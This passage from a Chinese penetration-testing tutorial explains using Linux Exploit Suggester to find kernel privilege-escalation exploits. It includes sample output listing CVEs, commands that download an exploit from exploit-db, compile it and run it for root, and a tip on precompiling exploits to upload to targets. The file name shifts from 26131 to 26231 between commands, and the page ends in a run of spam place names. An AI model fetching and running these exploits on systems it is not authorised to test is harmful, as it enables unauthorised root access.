官术网_书友最值得收藏!

1.4 Linux提權輔助工具Linux Exploit Suggester

Linux Exploit Suggester是一款根據操作系統版本號自動查找相應提權腳本的工具,如果不帶任何參數運行該腳本,將執行“uname-r”命令返回操作系統發行版本信息,也可以手工輸入“-k”參數查找指定版本號。Linux Exploit Suggester的官方下載地址為https://github.com/PenturaLabs/Linux_Exploit_Suggester,該程序2014年以后就沒有更新了。

1.4.1 列出可能的漏洞

執行如下命令,列出內核版本為Linux 3.0.0的所有可能漏洞,如圖1-43所示。漏洞利用程序和腳本可以在http://www.exploit-db.com/網站下載。

圖1-43 列出所有可用的漏洞利用程序

        perl ./Linux_Exploit_Suggester.pl -k 3.0.0

或者

        ./Linux_Exploit_Suggester.pl -k 3.0.0

如果執行的是默認程序,則自動識別當前內核版本,并提示可以利用的漏洞程序。例如,在CentOS Release 5.6 (Final)內核版本2.6.18-238.el5下運行該程序,將得到如下結果。

        sh-3.2$ ./Linux_Exploit_Suggester.pl
        Kernel local: 2.6.18
        Searching among 65 exploits...
        Possible Exploits:
        [+] american-sign-language
          CVE-2010-4347
          Source: http://www.securityfocus.com/bid/45408/
        [+] can_bcm
          CVE-2010-2959
          Source: http://www.exploit-db.com/exploits/14814/
        [+] do_pages_move
          Alt: sieve   CVE-2010-0415
          Source: Spenders Enlightenment
        [+] ftrex
          CVE-2008-4210
          Source: http://www.exploit-db.com/exploits/6851
        [+] half_nelson
          Alt: econet   CVE-2010-3848
          Source: http://www.exploit-db.com/exploits/6851
        [+] half_nelson1
          Alt: econet   CVE-2010-3848
          Source: http://www.exploit-db.com/exploits/17787/
        [+] half_nelson2
          Alt: econet   CVE-2010-3850
          Source: http://www.exploit-db.com/exploits/17787/
        [+] half_nelson3
          Alt: econet   CVE-2010-4073
          Source: http://www.exploit-db.com/exploits/17787/
        [+] msr
          CVE-2013-0268
          Source: http://www.exploit-db.com/exploits/27297/
        [+] pipe.c_32bit
          CVE-2009-3547
          Source: http://www.securityfocus.com/data/vulnerabilities/exploits/
    36901-1.c
        [+] pktcdvd
          CVE-2010-3437
          Source: http://www.exploit-db.com/exploits/15150/
        [+] reiserfs
          CVE-2010-1146
          Source: http://www.exploit-db.com/exploits/12130/
        [+] sock_sendpage
          Alt: wunderbar_emporium   CVE-2009-2692
          Source: http://www.exploit-db.com/exploits/9435
        [+] sock_sendpage2
          Alt: proto_ops   CVE-2009-2692
          Source: http://www.exploit-db.com/exploits/9436
        [+] udp_sendmsg_32bit
          CVE-2009-2698
          Source: http://downloads.securityfocus.com/vulnerabilities/exploits/
    36108.c
        [+] video4linux
          CVE-2010-3081
          Source: http://www.exploit-db.com/exploits/15024/
        [+] vmsplice1
          Alt: jessica biel   CVE-2008-0600
          Source: http://www.exploit-db.com/exploits/5092

1.4.2 下載可利用的腳本

使用“wget url漏洞地址”命令下載漏洞程序。例如,通過檢測得知內核為Linux 3.0.0,可能存在perf_swevent漏洞,其漏洞編號為CVE-2013-2094,可利用程序名字為26131,下載命令如下。

        wget http://www.exploit-db.com/download/26131

1.4.3 編譯并執行

在一般情況下,執行如下命令執行即可。對特殊的編譯情況,可利用漏洞程序會給出相應的說明。

        gcc 26131.c -o 26131
        chmod +x 26231
        ./26231

如果能夠獲取root權限,則會進行相應的提示。root權限可以通過命令“id”或者提示符來認定。

1.4.4 總結與思考

下面總結一些提權技巧。

·可以根據編譯結果來判斷是否存在漏洞。例如,“[-] mmap(): Operation not permitted”表示沒有權限,無法成功提權。

·可以在相應內核版本的虛擬機中編譯漏洞利用程序,下次碰到時可以直接上傳執行,從而提高效率。

·可以使用“./Linux_Exploit_Suggester.pl>1.txt”命令將所有結果保存在1.txt中,然后對照程序進行下載和編譯。

·在使用“wget http://www.exploit-db.com/exploits/5092”命令下載時需要添加“--no-check-certificate”參數。如果不能下載,則需要使用瀏覽器打開網站下載。

主站蜘蛛池模板: 乌兰察布市| 鄯善县| 北安市| 漳平市| 余江县| 迁安市| 周口市| 南木林县| 武夷山市| 蒲城县| 绥化市| 芦溪县| 镇巴县| 绥棱县| 东台市| 志丹县| 陵水| 盐亭县| 旬邑县| 偏关县| 德化县| 阳东县| 平谷区| 辉南县| 连云港市| 平定县| 陵川县| 文安县| 育儿| 海原县| 宜城市| 长汀县| 乌兰浩特市| 长白| 吕梁市| 巩留县| 文山县| 民和| 普安县| 来宾市| 建瓯市|